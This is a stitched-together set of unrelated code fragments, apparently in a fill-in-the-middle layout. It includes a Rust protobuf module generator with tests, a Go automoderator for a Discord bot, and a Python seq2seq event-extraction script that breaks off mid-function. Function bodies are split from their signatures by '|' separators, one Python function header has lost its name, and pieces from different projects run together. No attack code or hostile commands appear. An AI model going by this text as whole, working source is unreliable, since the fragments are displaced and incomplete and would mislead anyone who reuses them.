imports.push(proto.clone());
} else {
let prot = proto_rec(root.clone(), path.clone(), map);
imports.push(prot.clone());
map.insert(path, prot);
}
}
}
}
Proto {
path,
package: package.unwrap(),
imports,
}
}
fn add_deps_rec(src: &Proto, proto: &Proto, map: &mut HashMap<Package, HashSet<Package>>) {
let e = map
.entry(proto.package.clone())
.or_insert_with(HashSet::new);
e.insert(src.package.clone());
for import in proto.imports.iter() {
add_deps_rec(src, &import, map);
}
}
fn deps_resolver(protos: &[Proto]) -> HashMap<Package, HashSet<Package>> {
let mut map = HashMap::new();
for p in protos.iter() {
add_deps_rec(p, p, &mut map);
}
map
}
pub fn feature_gates(protos: &[Proto], broken_features: &[String]) -> String {
let pkgs = protos
.iter()
.map(|p| p.package.feature_name())
.collect::<HashSet<_>>();
let mut pkgs = pkgs.into_iter().collect::<Vec<_>>();
pkgs.sort();
pkgs.into_iter()
.map(|f| {
let is_broken = broken_features.contains(&f);
format!("{}{} = []", is_broken.then(|| "# ").unwrap_or_default(), f)
})
.collect::<Vec<_>>()
.join("\n")
}
pub fn feature_names(protos: &[Proto], broken_features: &[String]) -> String |
pub fn proto_path(protos: &[Proto]) -> Vec<PathBuf> {
let mut ret = protos
.iter()
.map(|p| p.path.clone())
// TODO: There is a syntax error in google.ads.googleads.v5 and google.ads.googleads.v6.
// See https://github.com/googleapis/googleapis/pull/622 and https://github.com/mechiru/googapis/pull/9.
.filter(|p| {
let path = p.to_str().unwrap();
!(path.contains("google/ads/googleads/v5") || path.contains("google/ads/googleads/v6"))
})
.collect::<Vec<_>>();
ret.sort();
ret
}
pub fn from_protos(protos: Vec<Proto>) -> RootModule {
let mut map = HashMap::new();
let resolver = deps_resolver(&protos);
for proto in protos {
let mut iter = proto.package.escaped_vec.clone().into_iter();
let mut package = Vec::new();
let pkg = iter.next().unwrap();
package.push(pkg.clone());
let mut e = map
.entry(pkg)
.or_insert_with(|| Module::empty(Package::from_escaped_vec(package.clone())));
while let Some(pkg) = iter.next() {
package.push(pkg.clone());
e = e
.children
.entry(pkg)
.or_insert_with(|| Module::empty(Package::from_escaped_vec(package.clone())));
}
assert_eq!(proto.package, e.package);
e.include = true;
if let Some(pkgs) = resolver.get(&e.package) {
for pkg in pkgs {
e.imported_by.insert(pkg.clone());
}
}
}
RootModule(map)
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_pacakge_from_escaped_vec() {
let vec = vec!["mechiru".into(), "r#type".into(), "r#as".into()];
assert_eq!(
Package::from_escaped_vec(vec.clone()),
Package {
raw: "mechiru.type.as".into(),
escaped: "mechiru.r#type.r#as".into(),
escaped_vec: vec,
}
);
}
#[test]
fn test_package_from() {
assert_eq!(
Package::from("mechiru.type.as"),
Package::from_escaped_vec(vec!["mechiru".into(), "r#type".into(), "r#as".into()])
);
}
#[test]
fn test_feature_name() {
assert_eq!(
Package::from("mechiru.type.as").feature_name(),
"mechiru-type-as".to_owned()
);
}
#[test]
fn test_parse_package() {
assert_eq!(parse_package("package mechiru;"), Some("mechiru".into()));
assert_eq!(
parse_package("package mechiru.storage;"),
Some("mechiru.storage".into())
);
}
#[test]
fn test_parse_import() {
assert_eq!(
parse_import(r#"import "mechiru/common.proto";"#),
Some("mechiru/common.proto".into())
);
assert_eq!(
parse_import(r#"import weak "mechiru/common.proto";"#),
Some("mechiru/common.proto".into())
);
assert_eq!(
parse_import(r#"import public "mechiru/common.proto";"#),
Some("mechiru/common.proto".into())
);
}
fn protos() -> Vec<Proto> {
vec![
Proto {
path: PathBuf::from("/a/b.proto"),
package: "a".into(),
imports: vec![
Proto {
path: PathBuf::from("/a/c.proto"),
package: "a".into(),
imports: vec![Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: vec![Proto {
path: PathBuf::from("/d/f.proto"),
package: "d".into(),
imports: Vec::new(),
}],
}],
},
Proto {
path: PathBuf::from("/b/d.proto"),
package: "b".into(),
imports: vec![Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: Vec::new(),
}],
},
],
},
Proto {
path: PathBuf::from("/a/c.proto"),
package: "a".into(),
imports: vec![Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: vec![Proto {
path: PathBuf::from("/d/f.proto"),
package: "d".into(),
imports: Vec::new(),
}],
}],
},
Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: vec![Proto {
path: PathBuf::from("/d/f.proto"),
package: "d".into(),
imports: Vec::new(),
}],
},
Proto {
path: PathBuf::from("/d/f.proto"),
package: "d".into(),
imports: Vec::new(),
},
Proto {
path: PathBuf::from("/b/d.proto"),
package: "b".into(),
imports: vec![Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: Vec::new(),
}],
},
Proto {
path: PathBuf::from("/c/e.proto"),
package: "c".into(),
imports: Vec::new(),
},
]
}
#[test]
fn test_add_deps_rec() {
let protos = protos();
let mut map = HashMap::new();
for proto in protos {
add_deps_rec(&proto, &proto, &mut map);
}
assert_eq!(map, {
let mut map = HashMap::new();
map.insert("a".into(), {
let mut set = HashSet::new();
set.insert("a".into());
set
});
map.insert("b".into(), {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("b".into());
set
});
map.insert("c".into(), {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("b".into());
set.insert("c".into());
set
});
map.insert("d".into(), {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("c".into());
set.insert("d".into());
set
});
map
});
}
#[test]
fn test_from_protos() {
let protos = protos();
assert_eq!(from_protos(protos), {
let mut map = HashMap::new();
map.insert(
"a".into(),
Module {
package: "a".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("a".into());
set
},
children: HashMap::new(),
},
);
map.insert(
"b".into(),
Module {
package: "b".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("b".into());
set
},
children: HashMap::new(),
},
);
map.insert(
"c".into(),
Module {
package: "c".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("b".into());
set.insert("c".into());
set
},
children: HashMap::new(),
},
);
map.insert(
"d".into(),
Module {
package: "d".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("a".into());
set.insert("c".into());
set.insert("d".into());
set
},
children: HashMap::new(),
},
);
RootModule(map)
});
}
#[test]
fn test_root_module_gen_code() {
let root = from_protos(protos());
assert_eq!(
root.gen_code(),
r###"pub mod a { #[cfg(any(feature = "a",))]
include_proto!("a");
}
pub mod b { #[cfg(any(feature = "a",feature = "b",))]
include_proto!("b");
}
pub mod c { #[cfg(any(feature = "a",feature = "b",feature = "c",))]
include_proto!("c");
}
pub mod d { #[cfg(any(feature = "a",feature = "c",feature = "d",))]
include_proto!("d");
}
"###
);
}
#[test]
fn test_module_gen_code() {
let module = Module {
package: "mechiru.type".into(),
include: true,
imported_by: {
let mut set = HashSet::new();
set.insert("mechiru.type".into());
set
},
children: HashMap::new(),
};
assert_eq!(
module.gen_code(),
r###"#[cfg(any(feature = "mechiru-type",))]
include_proto!("mechiru.r#type");
"###
);
}
}
| {
let pkgs = protos
.iter()
.map(|p| p.package.feature_name())
.collect::<HashSet<_>>();
let mut pkgs = pkgs.into_iter().collect::<Vec<_>>();
pkgs.sort();
pkgs.into_iter()
.map(|f| {
let is_broken = broken_features.contains(&f);
format!(" {}{}", is_broken.then(|| "# ").unwrap_or_default(), f)
})
.collect::<Vec<_>>()
.join("\n")
} |
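`parse_package` and `parse_import` above follow the proto3 grammar lines quoted in their comments (`package = "package" fullIdent ";"` and `import = "import" [ "weak" | "public" ] strLit ";"`). A rough Python equivalent of the same line-level parsing, for illustration only:

```python
def parse_package(line):
    if line.startswith("package"):
        return line[len("package"):].split(";")[0].strip()
    return None

def parse_import(line):
    if line.startswith("import"):
        rest = line[len("import"):]
        for quote in ('"', "'"):
            if quote in rest:
                # take the text between the first pair of quotes
                return rest.split(quote)[1]
    return None

print(parse_package("package mechiru.storage;"))               # mechiru.storage
print(parse_import('import public "mechiru/common.proto";'))   # mechiru/common.proto
```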
bot.go | package automod_legacy
import (
"time"
"github.com/botlabs-gg/yagpdb/v2/analytics"
"github.com/botlabs-gg/yagpdb/v2/bot"
"github.com/botlabs-gg/yagpdb/v2/bot/eventsystem"
"github.com/botlabs-gg/yagpdb/v2/commands"
"github.com/botlabs-gg/yagpdb/v2/common"
"github.com/botlabs-gg/yagpdb/v2/common/pubsub"
"github.com/botlabs-gg/yagpdb/v2/lib/discordgo"
"github.com/botlabs-gg/yagpdb/v2/lib/dstate"
"github.com/botlabs-gg/yagpdb/v2/moderation"
"github.com/karlseguin/ccache"
)
var _ bot.BotInitHandler = (*Plugin)(nil)
var (
// cache configs because they are used often
confCache *ccache.Cache
)
func (p *Plugin) BotInit() {
commands.MessageFilterFuncs = append(commands.MessageFilterFuncs, CommandsMessageFilterFunc)
eventsystem.AddHandlerAsyncLastLegacy(p, HandleMessageUpdate, eventsystem.EventMessageUpdate)
pubsub.AddHandler("update_automod_legacy_rules", HandleUpdateAutomodRules, nil)
confCache = ccache.New(ccache.Configure().MaxSize(1000))
}
// Invalidate the cache when the rules have changed
func HandleUpdateAutomodRules(event *pubsub.Event) {
confCache.Delete(KeyConfig(event.TargetGuildInt))
}
// CachedGetConfig either retrieves from local application cache or redis
func CachedGetConfig(gID int64) (*Config, error) |
func CommandsMessageFilterFunc(evt *eventsystem.EventData, msg *discordgo.Message) bool {
return !CheckMessage(evt, msg)
}
func HandleMessageUpdate(evt *eventsystem.EventData) {
CheckMessage(evt, evt.MessageUpdate().Message)
}
func CheckMessage(evt *eventsystem.EventData, m *discordgo.Message) bool {
if !bot.IsNormalUserMessage(m) {
return false
}
if m.Author.ID == common.BotUser.ID || m.Author.Bot || m.GuildID == 0 {
return false // Pls no panicerinos or banerinos self
}
if !evt.HasFeatureFlag(featureFlagEnabled) {
return false
}
cs := evt.GS.GetChannelOrThread(m.ChannelID)
if cs == nil {
logger.WithField("channel", m.ChannelID).Error("Channel not found in state")
return false
}
config, err := CachedGetConfig(cs.GuildID)
if err != nil {
logger.WithError(err).Error("Failed retrieving config")
return false
}
if !config.Enabled {
return false
}
member := dstate.MemberStateFromMember(m.Member)
member.GuildID = m.GuildID
del := false // Set if a rule triggered a message delete
punishMsg := ""
highestPunish := PunishNone
muteDuration := 0
rules := []Rule{config.Spam, config.Invite, config.Mention, config.Links, config.Words, config.Sites}
didCheck := false
// We're going to need this locked while we check
for _, r := range rules {
if r.ShouldIgnore(cs, m, member) {
continue
}
didCheck = true
d, punishment, msg, err := r.Check(m, cs)
if d {
del = true
}
if err != nil {
logger.WithError(err).WithField("guild", cs.GuildID).Error("Failed checking automod rule:", err)
continue
}
// If the rule did not trigger a deletion there wasn't any violation
if !d {
continue
}
punishMsg += msg + "\n"
if punishment > highestPunish {
highestPunish = punishment
muteDuration = r.GetMuteDuration()
}
}
if !del {
if didCheck {
go analytics.RecordActiveUnit(cs.GuildID, &Plugin{}, "checked")
}
return false
}
go analytics.RecordActiveUnit(cs.GuildID, &Plugin{}, "rule_triggered")
if punishMsg != "" {
// Strip last newline
punishMsg = punishMsg[:len(punishMsg)-1]
}
go func() {
switch highestPunish {
case PunishNone:
err = moderation.WarnUser(nil, cs.GuildID, cs, m, common.BotUser, &member.User, "Automoderator: "+punishMsg)
case PunishMute:
err = moderation.MuteUnmuteUser(nil, true, cs.GuildID, cs, m, common.BotUser, "Automoderator: "+punishMsg, member, muteDuration)
case PunishKick:
err = moderation.KickUser(nil, cs.GuildID, cs, m, common.BotUser, "Automoderator: "+punishMsg, &member.User, -1)
case PunishBan:
err = moderation.BanUser(nil, cs.GuildID, cs, m, common.BotUser, "Automoderator: "+punishMsg, &member.User)
}
// Execute the punishment before removing the message to make sure it's included in logs
common.BotSession.ChannelMessageDelete(m.ChannelID, m.ID)
if err != nil && err != moderation.ErrNoMuteRole && !common.IsDiscordErr(err, discordgo.ErrCodeMissingPermissions, discordgo.ErrCodeMissingAccess) {
logger.WithError(err).Error("Error carrying out punishment")
}
}()
return true
}
| {
confItem, err := confCache.Fetch(KeyConfig(gID), time.Minute*5, func() (interface{}, error) {
c, err := GetConfig(gID)
if err != nil {
return nil, err
}
// Compile sites and words
c.Sites.GetCompiled()
c.Words.GetCompiled()
return c, nil
})
if err != nil {
return nil, err
}
return confItem.Value().(*Config), nil
} |
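`CachedGetConfig` above is a fetch-or-compute cache with a five-minute TTL built on `ccache`. A small generic sketch of that pattern in Python (names and TTL are illustrative, not part of the Go code):

```python
import time

class TTLCache:
    """Fetch-or-compute cache: reuse a value until its TTL expires."""
    def __init__(self):
        self._items = {}  # key -> (expires_at, value)

    def fetch(self, key, ttl_seconds, compute):
        now = time.time()
        hit = self._items.get(key)
        if hit and hit[0] > now:
            return hit[1]
        value = compute()
        self._items[key] = (now + ttl_seconds, value)
        return value

cache = TTLCache()
config = cache.fetch("config:1234", 300, lambda: {"enabled": True})  # placeholder loader
```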
Joint_Event_Extraction.py | import sys
import os
import numpy as np
import random
from collections import OrderedDict
import pickle
import datetime
from tqdm import tqdm
from recordclass import recordclass
import math
import torch
import torch.autograd as autograd
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import json
# Helper funcs
def custom_print(*msg):
for i in range(0, len(msg)):
if i == len(msg) - 1:
print(msg[i])
logger.write(str(msg[i]) + '\n')
else:
print(msg[i], ' ', end='')
logger.write(str(msg[i]))
def load_word_embedding(embed_file, vocab):
custom_print('vocab length:', len(vocab))
embed_vocab = OrderedDict()
rev_embed_vocab = OrderedDict()
embed_matrix = list()
embed_vocab['<PAD>'] = 0
rev_embed_vocab[0] = '<PAD>'
embed_matrix.append(np.zeros(word_embed_dim, dtype=np.float32))
embed_vocab['<UNK>'] = 1
rev_embed_vocab[1] = '<UNK>'
embed_matrix.append(np.random.uniform(-0.25, 0.25, word_embed_dim))
embed_vocab['<SOS>'] = 2
rev_embed_vocab[2] = '<SOS>'
embed_matrix.append(np.random.uniform(-0.25, 0.25, word_embed_dim))
embed_vocab['<EOS>'] = 3
rev_embed_vocab[3] = '<EOS>'
embed_matrix.append(np.random.uniform(-0.25, 0.25, word_embed_dim))
word_idx = 4
with open(embed_file, "r") as f:
for line in f:
parts = line.split()
if len(parts) < word_embed_dim + 1:
continue
word = parts[0]
if word in vocab and vocab[word] >= word_min_freq:
vec = [np.float32(val) for val in parts[1:]]
embed_matrix.append(vec)
embed_vocab[word] = word_idx
rev_embed_vocab[word_idx] = word
word_idx += 1
for word in vocab:
if word not in embed_vocab and vocab[word] >= word_min_freq:
embed_matrix.append(np.random.uniform(-0.25, 0.25, word_embed_dim))
embed_vocab[word] = word_idx
rev_embed_vocab[word_idx] = word
word_idx += 1
custom_print('embed dictionary length:', len(embed_vocab))
return embed_vocab, rev_embed_vocab, np.array(embed_matrix, dtype=np.float32)
def build_vocab(data, events, arguments, roles, vocab_file, embed_file):
vocab = OrderedDict()
char_v = OrderedDict()
char_v['<PAD>'] = 0
char_v['<UNK>'] = 1
char_v[';'] = 2
char_v['|'] = 3
char_idx = 4
for d in data:
for word in d.SrcWords:
if word not in vocab:
vocab[word] = 1
else:
vocab[word] += 1
for c in word:
if c not in char_v:
char_v[c] = char_idx
char_idx += 1
for event in events:
vocab[event] = word_min_freq
for argument in arguments:
vocab[argument] = word_min_freq
for role in roles:
vocab[role] = word_min_freq
vocab[';'] = word_min_freq
vocab['|'] = word_min_freq
word_v, rev_word_v, embed_matrix = load_word_embedding(embed_file, vocab)
output = open(vocab_file, 'wb')
pickle.dump([word_v, char_v], output)
output.close()
return word_v, rev_word_v, char_v, embed_matrix
def load_vocab(vocab_file):
with open(vocab_file, 'rb') as f:
word_v, char_v = pickle.load(f)
return word_v, char_v
def get_adj_mat(amat):
K = 5
adj_mat = np.zeros((len(amat), len(amat)), np.float32)
for i in range(len(amat)):
for j in range(len(amat)):
if 0 <= amat[i][j] <= K:
adj_mat[i][j] = 1.0 / math.pow(2, amat[i][j])
else:
adj_mat[i][j] = 0
return adj_mat
def get_data(src_lines, trg_lines, datatype):
samples = []
uid = 1
src_len = -1
trg_len = -1
for i in range(0, len(src_lines)):
src_line = src_lines[i].strip()
trg_line = trg_lines[i].strip()
src_words = src_line.split()
if datatype == 1:
tuples = trg_line.strip().split('|')
random.shuffle(tuples)
new_trg_line = ' | '.join(tuples)
assert len(trg_line.split()) == len(new_trg_line.split())
trg_line = new_trg_line
trg_words = list()
trg_words.append('<SOS>')
trg_words += trg_line.split()
trg_words.append('<EOS>')
if datatype == 1 and (len(src_words) > max_src_len or len(trg_words) > max_trg_len + 1):
continue
if len(src_words) > src_len:
src_len = len(src_words)
if len(trg_words) > trg_len:
trg_len = len(trg_words)
sample = Sample(Id=uid, SrcLen=len(src_words), SrcWords=src_words, TrgLen=len(trg_words),
TrgWords=trg_words) #c
samples.append(sample)
uid += 1
print(src_len)
print(trg_len)
return samples
def | (src_file, trg_file, datatype):
reader = open(src_file)
src_lines = reader.readlines()
reader.close()
reader = open(trg_file)
trg_lines = reader.readlines()
reader.close()
# tot_len = 100
# src_lines = src_lines[0:min(tot_len, len(src_lines))]
# trg_lines = trg_lines[0:min(tot_len, len(trg_lines))]
# adj_lines = adj_lines[0:min(tot_len, len(adj_lines))]
data = get_data(src_lines, trg_lines, datatype)
return data
#event_lines, argument_lines, roles_lines
# TODO: add an option for less detailed checks
def check_event_trigger(ref_string, pred_string):
return (ref_string == pred_string)
pass
def check_event_type(ref_string, pred_string, event_lines):
if granular_mode == 0:
if pred_string in event_lines:
return (ref_string == pred_string)
else:
# print("invalid prediction")
return False
pass
if granular_mode == 1:
pred_token = pred_string.split(":")[0]
ref_token = ref_string.split(":")[0]
return (pred_token == ref_token)
pass
def check_event_argument(ref_string, pred_string):
return (ref_string == pred_string)
pass
def check_argument_type(ref_string, pred_string, argument_lines):
if granular_mode == 0:
if pred_string in argument_lines:
return (ref_string == pred_string)
else:
# print("invalid prediction")
return False
pass
if granular_mode == 1:
pred_token = pred_string.split(":")[0]
ref_token = ref_string.split(":")[0]
return (pred_token == ref_token)
pass
def check_argument_role(ref_string, pred_string, roles_lines):
if pred_string in roles_lines:
return (ref_string == pred_string)
else:
# print("invalid prediction")
return False
pass
def calculate_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines):
list_of_tracking_metrics = ['predicted_tuples',
'ground_truth_tuples',
'correct_predictions',
'events_count',
'correct_events',
'correct_event_type',
'correct_arguments',
'correct_argment_types',
'correct_argument_roles'
]
metric_counts = dict.fromkeys(list_of_tracking_metrics, 0)
for i in range(0, min(len(ref_lines), len(pred_lines))):
ref_line = ref_lines[i].strip()
pred_line = pred_lines[i].strip()
ref_tuples = ref_line.split('|')
pred_tuples = pred_line.split('|')
# find a way to compare multiple tuples
# correct - t1 | t2 | t3
# pred - p1 | p2
# positives = 3 [number of ground truths minus nones]
# predicted_pos = 2 [number of preds minus nones]
# TP = correct preds
# TP + FP = predicted
# TP + FN = positives
# Precision = correct / predicted_pos
# Recall = correct / positives
# F1 = 2 * Precision * Recall / (Precision + Recall)
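# Worked example with hypothetical counts: 3 ground-truth tuples, 2 predicted, 1 correct.
# Precision = 1 / 2 = 0.5, Recall = 1 / 3 ~= 0.333
# F1 = 2 * 0.5 * 0.333 / (0.5 + 0.333) ~= 0.4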
# handling repeated predictions
# set_of_preds = set()
# for pred_tuple in pred_tuples:
# set_of_preds.add(pred_tuple.strip())
# pred_tuples = list(set_of_preds)
for pred_tuple in pred_tuples:
pred_strings = pred_tuple.split(';')
if(len(pred_strings) < 3):
continue
# in the case of no argument detection, we only calculate the event trigger scores
if(pred_strings[2].strip().lower()) == 'none':
max_matches = 0
part_matches = []
for ref_tuple in ref_tuples:
ev1, ev2 = cal_f1_for_pair(ref_tuple, pred_tuple, event_lines)
pair_score = ev1+ev2
if pair_score > max_matches:
max_matches = pair_score
part_matches = (ev1, ev2)
pass
pass
metric_counts['events_count'] += 1
# use the best-matching pair found above, not the last one checked
if part_matches and part_matches[0] == 1:
metric_counts['correct_events'] += 1
if part_matches and part_matches[1] == 1:
metric_counts['correct_event_type'] += 1
continue
max_matches = 0
part_matches = cal_f1_for_tuple(ref_tuples[0], pred_tuple, event_lines, argument_lines, roles_lines)
for ref_tuple in ref_tuples:
res = cal_f1_for_tuple(ref_tuple, pred_tuple, event_lines, argument_lines, roles_lines)
tuple_score = sum(res)
if tuple_score >= max_matches:
max_matches = tuple_score
part_matches = res
pass
pass
metric_counts['predicted_tuples'] += 1
metric_counts['events_count'] += 1
if max_matches >= 4:
metric_counts['correct_predictions'] += 1
if part_matches[0] == 1:
metric_counts['correct_events'] += 1
if part_matches[1] == 1:
metric_counts['correct_event_type'] += 1
if part_matches[2] == 1:
metric_counts['correct_arguments'] += 1
if part_matches[3] == 1:
metric_counts['correct_argment_types'] += 1
if part_matches[4] == 1:
metric_counts['correct_argument_roles'] += 1
pass
for ref_tuple in ref_tuples:
if(ref_tuple.split(';')[2].strip().lower()) != 'none':
metric_counts['ground_truth_tuples'] += 1
pass
print(metric_counts)
precision = float(metric_counts['correct_predictions'] / (metric_counts['predicted_tuples'] + 1e-08))
recall = float(metric_counts['correct_predictions'] / (metric_counts['ground_truth_tuples'] + 1e-08))
f1 = 2 * precision * recall / (precision + recall + 1e-08)
precision = round(precision, 3)
recall = round(recall, 3)
f1 = round(f1, 3)
print("Partwise Results")
event_acc = metric_counts['correct_events']/ (metric_counts['events_count'] + 1e-08)
evtype_acc = metric_counts['correct_event_type']/ (metric_counts['events_count'] + 1e-08)
argument_acc = metric_counts['correct_arguments']/ (metric_counts['predicted_tuples'] + 1e-08)
argtype_acc = metric_counts['correct_argment_types']/ (metric_counts['predicted_tuples'] + 1e-08)
role_acc = metric_counts['correct_argument_roles']/ (metric_counts['predicted_tuples'] + 1e-08)
print(f'Event Trigger Word Accuracy: {event_acc}')
print(f'Event Type Accuracy: {evtype_acc}')
print(f'Argument Identification Accuracy: {argument_acc}')
print(f'Argument Type Accuracy: {argtype_acc}')
print(f'Argument Role Accuracy: {role_acc}')
print(f'Macro f-score: {f1}')
targ_file = os.path.join(trg_data_folder, 'Results_logger.txt')
f = open(targ_file, "a")
f.write(f'Event Trigger Word Accuracy: {event_acc}')
f.write("\n")
f.write(f'Event Type Accuracy: {evtype_acc}')
f.write("\n")
f.write(f'Argument Identification Accuracy: {argument_acc}')
f.write("\n")
f.write(f'Argument Type Accuracy: {argtype_acc}')
f.write("\n")
f.write(f'Argument Role Accuracy: {role_acc}')
f.write("\n")
f.write(f'Macro f-score: {f1}')
f.write("\n")
f.close()
return f1
def cal_f1_for_pair(ref_tuple: str ,
pred_tuple: str,
event_lines: list
) -> list:
ref_strings = ref_tuple.split(';')
pred_strings = pred_tuple.split(';')
ev1 = int( check_event_trigger(ref_strings[0].strip(), pred_strings[0].strip()) )
ev2 = int( check_event_type(ref_strings[1].strip(), pred_strings[1].strip(), event_lines) )
return ev1, ev2
def cal_f1_for_tuple(ref_tuple: str ,
pred_tuple: str,
event_lines: list,
argument_lines: list,
roles_lines: list
) -> list:
ref_strings = ref_tuple.split(';')
pred_strings = pred_tuple.split(';')
if (len (pred_strings) != 5 ):
if (len (pred_strings) >= 2 ):
ev1 = int( check_event_trigger(ref_strings[0].strip(), pred_strings[0].strip()) )
ev2 = int( check_event_type(ref_strings[1].strip(), pred_strings[1].strip(), event_lines) )
return [ev1, ev2, 0, 0, 0]
return list([0,0,0,0,0])
ev1 = int( check_event_trigger(ref_strings[0].strip(), pred_strings[0].strip()) )
ev2 = int( check_event_type(ref_strings[1].strip(), pred_strings[1].strip(), event_lines) )
ev3 = int( check_event_argument(ref_strings[2].strip(), pred_strings[2].strip()) )
ev4 = int( check_argument_type(ref_strings[3].strip(), pred_strings[3].strip(), argument_lines) )
ev5 = int( check_argument_role(ref_strings[4].strip(), pred_strings[4].strip(), roles_lines) )
ret = [ev1, ev2, ev3, ev4, ev5]
return ret
def get_model(model_id):
if model_id == 1:
return SeqToSeqModel()
def write_test_res(data, preds, attns, outfile):
writer = open(outfile, 'w')
for i in range(0, len(data)):
pred_words = get_pred_words(preds[i], attns[i], data[i].SrcWords)[:-1]
writer.write(' '.join(pred_words) + '\n')
writer.close()
def set_random_seeds(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if n_gpu > 1:
torch.cuda.manual_seed_all(seed)
def get_max_len(sample_batch):
src_max_len = len(sample_batch[0].SrcWords)
for idx in range(1, len(sample_batch)):
if len(sample_batch[idx].SrcWords) > src_max_len:
src_max_len = len(sample_batch[idx].SrcWords)
trg_max_len = len(sample_batch[0].TrgWords)
for idx in range(1, len(sample_batch)):
if len(sample_batch[idx].TrgWords) > trg_max_len:
trg_max_len = len(sample_batch[idx].TrgWords)
return src_max_len, trg_max_len
def get_words_index_seq(words, max_len):
seq = list()
for word in words:
if word in word_vocab:
seq.append(word_vocab[word])
else:
seq.append(word_vocab['<UNK>'])
pad_len = max_len - len(words)
for i in range(0, pad_len):
seq.append(word_vocab['<PAD>'])
return seq
def get_target_words_index_seq(words, max_len):
seq = list()
for word in words:
if word in word_vocab:
seq.append(word_vocab[word])
else:
seq.append(word_vocab['<UNK>'])
pad_len = max_len - len(words)
for i in range(0, pad_len):
seq.append(word_vocab['<EOS>'])
return seq
def get_padded_mask(cur_len, max_len):
mask_seq = list()
for i in range(0, cur_len):
mask_seq.append(0)
pad_len = max_len - cur_len
for i in range(0, pad_len):
mask_seq.append(1)
return mask_seq
def get_target_vocab_mask(src_words):
mask = []
for i in range(0, len(word_vocab)):
mask.append(1)
for word in src_words:
if word in word_vocab:
mask[word_vocab[word]] = 0
# events, arguments, roles
for event in events:
mask[word_vocab[event]] = 0
for argument in arguments:
mask[word_vocab[argument]] = 0
for role in roles:
mask[word_vocab[role]] = 0
mask[word_vocab['<UNK>']] = 0
mask[word_vocab['<EOS>']] = 0
mask[word_vocab[';']] = 0
mask[word_vocab['|']] = 0
return mask
def get_rel_mask(trg_words, max_len):
mask_seq = list()
for word in trg_words:
mask_seq.append(0)
# if word in relations:
# mask_seq.append(0)
# else:
# mask_seq.append(1)
pad_len = max_len - len(trg_words)
for i in range(0, pad_len):
mask_seq.append(1)
return mask_seq
def get_char_seq(words, max_len):
char_seq = list()
for i in range(0, conv_filter_size - 1):
char_seq.append(char_vocab['<PAD>'])
for word in words:
for c in word[0:min(len(word), max_word_len)]:
if c in char_vocab:
char_seq.append(char_vocab[c])
else:
char_seq.append(char_vocab['<UNK>'])
pad_len = max_word_len - len(word)
for i in range(0, pad_len):
char_seq.append(char_vocab['<PAD>'])
for i in range(0, conv_filter_size - 1):
char_seq.append(char_vocab['<PAD>'])
pad_len = max_len - len(words)
for i in range(0, pad_len):
for i in range(0, max_word_len + conv_filter_size - 1):
char_seq.append(char_vocab['<PAD>'])
return char_seq
def get_relations(file_name):
rels = []
reader = open(file_name)
lines = reader.readlines()
reader.close()
for line in lines:
rels.append(line.strip())
return rels
def get_batch_data(cur_samples, is_training=False):
"""
Returns the training samples and labels as numpy arrays
"""
batch_src_max_len, batch_trg_max_len = get_max_len(cur_samples)
src_words_list = list()
src_words_mask_list = list()
src_char_seq = list()
trg_words_list = list()
trg_vocab_mask = list()
adj_lst = []
target = list()
cnt = 0
for sample in cur_samples:
src_words_list.append(get_words_index_seq(sample.SrcWords, batch_src_max_len))
src_words_mask_list.append(get_padded_mask(sample.SrcLen, batch_src_max_len))
src_char_seq.append(get_char_seq(sample.SrcWords, batch_src_max_len))
trg_vocab_mask.append(get_target_vocab_mask(sample.SrcWords))
# cur_masked_adj = np.zeros((batch_src_max_len, batch_src_max_len), dtype=np.float32)
# cur_masked_adj[:len(sample.SrcWords), :len(sample.SrcWords)] = sample.AdjMat
# adj_lst.append(cur_masked_adj)
if is_training:
padded_trg_words = get_words_index_seq(sample.TrgWords, batch_trg_max_len)
trg_words_list.append(padded_trg_words)
target.append(padded_trg_words[1:])
else:
trg_words_list.append(get_words_index_seq(['<SOS>'], 1))
cnt += 1
return {'src_words': np.array(src_words_list, dtype=np.float32),
'src_chars': np.array(src_char_seq),
'src_words_mask': np.array(src_words_mask_list),
'adj': np.array(adj_lst),
'trg_vocab_mask': np.array(trg_vocab_mask),
'trg_words': np.array(trg_words_list, dtype=np.int32),
'target': np.array(target)}
def shuffle_data(data):
custom_print(len(data))
data.sort(key=lambda x: x.SrcLen)
num_batch = int(len(data) / batch_size)
rand_idx = random.sample(range(num_batch), num_batch)
new_data = []
for idx in rand_idx:
new_data += data[batch_size * idx: batch_size * (idx + 1)]
if len(new_data) < len(data):
new_data += data[num_batch * batch_size:]
return new_data
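# Illustrative note: shuffle_data first sorts samples by source length and then
# shuffles whole batch-sized chunks, so every batch groups sentences of similar
# length (less padding) while the order of batches is still randomized per epoch.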
def get_pred_words(preds, attns, src_words):
pred_words = []
for i in range(0, max_trg_len):
word_idx = preds[i]
if word_vocab['<EOS>'] == word_idx:
pred_words.append('<EOS>')
break
elif att_type != 'None' and copy_on and word_vocab['<UNK>'] == word_idx:
word_idx = attns[i]
pred_words.append(src_words[word_idx])
else:
pred_words.append(rev_word_vocab[word_idx])
return pred_words
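# Illustrative note: when copying is enabled and the decoder emits <UNK> at step i,
# the attention argmax attns[i] is used as a pointer into the source sentence and
# the corresponding source word is copied into the prediction instead of <UNK>.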
class WordEmbeddings(nn.Module):
def __init__(self, vocab_size, embed_dim, pre_trained_embed_matrix, drop_out_rate):
super(WordEmbeddings, self).__init__()
self.embeddings = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
self.embeddings.weight.data.copy_(torch.from_numpy(pre_trained_embed_matrix))
self.dropout = nn.Dropout(drop_out_rate)
def forward(self, words_seq):
word_embeds = self.embeddings(words_seq)
